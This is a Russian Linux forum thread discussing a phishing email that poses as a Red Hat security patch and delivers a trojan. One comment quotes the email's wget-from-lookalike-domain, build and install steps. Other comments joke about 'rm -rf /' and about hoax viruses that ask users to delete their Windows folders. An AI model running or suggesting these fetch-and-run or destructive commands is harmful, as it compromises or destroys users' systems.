LINUX.ORG.RU

Тактика почтовых вирусов для Windows начинает применятся против пользователей Linux


0

0

В поддельном письме, адресованном пользователям RedHat/Fedora предлагается скачать и установить "обновление безопасности". Обновление представляет из себя троянского коня.

>>> Подробности

★★★☆

Проверено: Demetrio ()

>Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

LOL!

>First download the patch from the Security RedHat mirror:
wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
Untar the patch:
tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst

Интересно патчи устанавливаются. :)

>An error occurred while loading http://www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz:
Unknown host www.fedora-redhat.com

Походу статья фейк, если даже домен, на который они ссылаются, не зареген.

mikhail
()
Ответ на: комментарий от chucha

А в зачем тогда это в новости постить, а не в толки?

mikhail
()

эта тактика безотказно работает под любой осью. главное чтоб за клавой сидел дебил. и лечить это можно только одним средством - не давать дебилам пароль от рута :/

anonymous
()
Ответ на: комментарий от anonymous

>А тут кто то говорил что под Linux нету вирусов .... Наивные ...

Ну и что это за вирус, который нужно самому скачать, установить и запустить, этак любой молокосос скрипт напишет и назавет его вирусом...
Все дело в способе распространения, в виндах ты не хозяин положения,
а в линуксе надо быть полным идиотом чтобы повестись на такое...

McMCC ★★★
()

Это даже не бугааааааааа :)
господа, до первого апреля еще пол-года :)

debosh2k
()
Ответ на: комментарий от anonymous

>и лечить это можно только одним средством - не давать дебилам пароль от рута :/

А также отвёртки, чтобы не дай бог биос не сбросили и не загрузились с дискеты и не поменяли пароль рута.

mikhail
()

А чё сопляки-линуксойды не знают электронных подписей своих мантейнеров

по секюрити?

Sun-ch
()
Ответ на: комментарий от mikhail

Это что-то типа "Хочешь чтобы твой Linux хорошо работал? Сделай из-под рута rm -rf /!" Не интересно, даже если кто-то бы и повёлся, невелика потеря для общества :)

Hokum ☆☆☆☆
()
Ответ на: комментарий от Sun-ch

> А чё сопляки-линуксойды не знают электронных подписей своих мантейнеров по секюрити?

Они даже слова "подпись" часто не знают.

Посмотри на лихих дебианщиков. Никаких подписей на пакетах. И ничего - живут.

anonymous
()
Ответ на: комментарий от anonymous

>Посмотри на лихих дебианщиков. Никаких подписей на пакетах. И ничего - >живут.

Брехать не мешки ворочать.

Похоже если кто здесь чего не знает так это ты.

anonymous
()
Ответ на: комментарий от anonymous

>Посмотри на лихих дебианщиков. Никаких подписей на пакетах. И ничего - живут.

В unstable все подписывается

Zloy_Krys
()

мдя, теперь самое опасное для компьютера - прокладка между стулом и кла-вой т.к. нужно быть полным дебилом чтобы повестись на такое....

palach
()

95% вирусов под винду так и распространяются. Под линуксом этого не было, поскольку

1. Пользователей относительно мало 2. Они относительно грамотнее 3. Большой разброс конфигураций системы

Но по мере распространения линукса в массы и стандартизации за счёт сокращения кол-ва дистрибутивов, всё будет как в винде.

Eugene_Korobko
()
Ответ на: комментарий от Eugene_Korobko

Покуда есть на свете дураки - обманом стало быть нам жить с руки (Ц)

anonymous
()
Ответ на: комментарий от Eugene_Korobko

> Но по мере распространения линукса в массы и стандартизации за счёт сокращения кол-ва дистрибутивов, всё будет как в винде.

Все-таки мне кажется, под рутом в линуксе сидит гораздо меньший процент пользователей, чем под Администратором в win

init ★★★★★
()
Ответ на: комментарий от anonymous

Страшный ICQ вирус. ВНИМАНИЕ! Вы только что получили САМЫЙ ПЕРВЫЙ!!!! САМЫЙ КРУТОЙ!!!! и САМЫЙ СТРАШНЫЙ!!!! ICQ-вирус!!! Я ужасно полиморфный, заразный и деструктивный, НО есть небольшая проблемка: 1. Мой автор вообще вирусы писать не умеет... 2. Не вирусы он тоже не умеет писать, у него по бэйсику тройка с натягом. 3. Умные дяди говорят моему автору, что ICQ-вирус вообще невозможен... 4. Но ему 16 лет, у него переходный возраст и потому плевал он на умных дядей! Поэтому ОЧЕНЬ Вас прошу сделать следующее: 1) Разослать меня кому только можно; 2) Стереть на своем компьютере папки WINDOWS и Мои Документы. Заранее спасибо! Искренне Ваш - СТРАШНЫЙ ICQ-вирус!

(с) Народ

CybOrc
()
Ответ на: комментарий от roboter

Если все пересядут под Linux то под рутом все равно меньший % будет висеть чем под виндой. Так как в Линуксе работать не под root'om проще чем под виндой не под админом.

anonymous
()
Ответ на: комментарий от CybOrc

Вирус "Талибан"

Здравствуйте, вы только-что получили почтовый вирус из Афганистана "Талибан", к сожалению,в нашей стране очень плохо с компьютерами, и по этому пожалуйста, перешлите меня всем своим знакомым, и сами удалите все файлы с своего диска.

anonymous
()
Ответ на: комментарий от roboter

> В том то и дело что етот процент увеличивается.

И чья это проблема кроме них самих?

В Win же у тебя в некоторых случаях нет выбора.

Helge
()

Ы-ы-ы-ы :))) Мне плохо :)

Deleted
()
Ответ на: комментарий от Helge

"В Win же у тебя в некоторых случаях нет выбора".

Нельзя ли по подробней рассказать, про эти самые случаи. Особенно про те, где совершенно нет возможности использовать "Run as..."

anonymous
()

Нравиться мне подход линуксоидов. Когда пользователи Win без ума шлёпают по разным файликам, разрешают догрузку HTML и рисунков в почте - "Винда дырявая"! Когда то же самое делают под Lin - дырявый юзер! Лицемерие - худший из пороков.

anonymous
()
Ответ на: комментарий от anonymous

расскажм как ты поменяешь системное время не из под админа? run as нет на часиках. а панель управления открыть и поанинсталлить проги через runas научи как?

я дома всех в XP перевел в обычные юзеры, так фигово... ладно игрушку поставить, я еще могу прийти и запустить setup от админа. а вот что-то еще по настрйокам - приходится перезаходить под собой. и еще эта ебанутая система в xp prof: есть два вида юзеров - юзеры и админы. админы могут все, юзеры не могут ни хуя. второе не устраивает, приходится давать админа.

anonymous
()
Ответ на: комментарий от anonymous

> А тут кто то говорил что под Linux нету вирусов .... Наивные ...

Вообще-то, уважаемый (несмотря даже на то, что боишься открыть другим имя свое), каноническое определение вируса предполагает саморепродукцию. Повторяй вслед за мной: "я больше не буду прогуливать уроки и буду внимательно читать в толковом словаре о значении каждого термина, который употребляю". И так раз 500, пока не осознаешь :) А если серьёзно, то на эту тему существуют весьма наукообразные исследования. Например, тута: http://www.ssl.stu.neva.ru/psw/virus/chap_2.html :)

yozhhh ★★★
()
Ответ на: комментарий от anonymous

>расскажм как ты поменяешь системное время не из под админа?

Новое дело.

А что теперь в ляпиксе сист. время может менять кто угодно?


Давай лутше расскажи, как работать с tcpdump без рутовых прав.

Sun-ch
()
Ответ на: комментарий от anonymous

> Нравиться мне подход линуксоидов. Когда пользователи Win без ума шлёпают по разным файликам, разрешают догрузку HTML и рисунков в почте - "Винда дырявая"! Когда то же самое делают под Lin - дырявый юзер! Лицемерие - худший из пороков.

Нет. Винда дырявая, когда ты сообще ничего не делаешь, а тебя msblast потихоньку имеет через lsass (ass- понятно, а ls - это что :) ).

yozhhh ★★★
()
Ответ на: комментарий от anonymous

>Нравиться мне подход линуксоидов. Когда пользователи Win без ума шлёпают по разным файликам, разрешают догрузку HTML и рисунков в почте - "Винда дырявая"! Когда то же самое делают под Lin - дырявый юзер! Лицемерие - худший из пороков.

Кто бы говорил, у тебя и лица то нет

Dubrovsky
()
Ответ на: комментарий от Sun-ch

ссаныч, ты не понял. в линуксе, стоящим второй осью, как раз проблем с этим нет так как существует sudo :NOPASSWD /bin/date.

ты расскажи как разрешить юзерам хрюши менять системное время (ну для примера) не давая при этом пароля рута (ой, Админа) ?

anonymous
()
Ответ на: комментарий от anonymous

А вот мне нравиться подход анонимусов: откуда вы всё это высосали? Дело тут вот в чём, в винде не имея желания себе навредить (если закрыть глаза на само её использование) пользователь постоянно имеет себе геморой с различными осложнениями. В нормальных Unix системах только явно деструктивные действия приводят к гемору. Да и то, зачастую всё-таки осложнений нет. Я не вполне понимаю, зачем сидеть под рутом в Linux, в то же время вполне понятно почему в винде зачастую пользователь имеет права админа.

Hokum ☆☆☆☆
()
Ответ на: комментарий от anonymous

Ну ваще сегодня на лоре день ламера.

0. Сихронизировать с ntp сервером

1. Группповые политики, заведи группу wheel и дай им это право.

Sun-ch
()
Ответ на: комментарий от anonymous

>man sudo

И чё?

tcpdump работает теперь без прав рута?

Беги книжку почитай, кто имеет право читать интерфейсы в

промискуетентной моде.

Sun-ch
()
Ответ на: комментарий от Sun-ch

Ну ваще сегодня на лоре день ламера. 0. Сихронизировать с ntp сервером

с каким ntp?!?!?!? откуда? машина дома. инета нет.

и вообще хинт: далеко не всегда время менять нужно в сторону правильного.

1. Группповые политики, заведи группу wheel и дай им это право. а, ну ну. че-то я там месяца три назад лазил. еще попробую и расскажу.

anonymous
()
Ответ на: комментарий от Sun-ch

>tcpdump работает теперь без прав рута?

а ппачему это он должен работать без рута? шоб каждый идиот интерфейсы напрямую читал?

anonymous
()
Ответ на: комментарий от anonymous

>А зачем пользователю работать с tcpdump? Вот зачем ему это надо?

это у ссаныча такое своеобразное понятие о работе нормального пользователя ...

типа поставили комп секретутке, ну а ей позарез tcpdump нужен... наверно корпоративную сеть будет ломать :):):)

anonymous
()
Ответ на: комментарий от anonymous

ну куда ж ему, бедному, без tcpdump'а? практически никуда...

anonymous
()
Ответ на: комментарий от anonymous

>А зачем пользователю работать с tcpdump? Вот зачем ему это надо?

Ну я не знаю, у нас многие в классе tcpdump юзают, типа девчонок в

локалке зажимают.

Sun-ch
()
Ответ на: комментарий от Sun-ch

>Ну я не знаю, у нас многие в классе tcpdump юзают, типа девчонок в

одним словом штудентики ...

в нормальной организации у пользователей всё урезано, по самое никуда ..

ибо нехер

anonymous
()
Ответ на: комментарий от Eugene_Korobko

>Contol Panel -> Administrative tools -> Local Security Settings -> Local Policies -> User Rights Assignment -> Change the system time -> добавляем юзера

опять же, нормальному пользователю это не надо ...

у нас, к примеру, отрублено. Есть один ntp, через него и время меняется

на домашней машине можно через ntp провайдера ставить.

например при подъёме ppp - синхронизиция времени

всё остальное оставить руту

anonymous
()
Ответ на: комментарий от Sun-ch

>>А че смотреть то, я и так знаю. >>ls -l /dev/bpf0 >>crw-------- 1 root wheel

нет, ты попробуй sudo tcpdump

и расскажи под кем он выполняется и что ему мешает читать.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.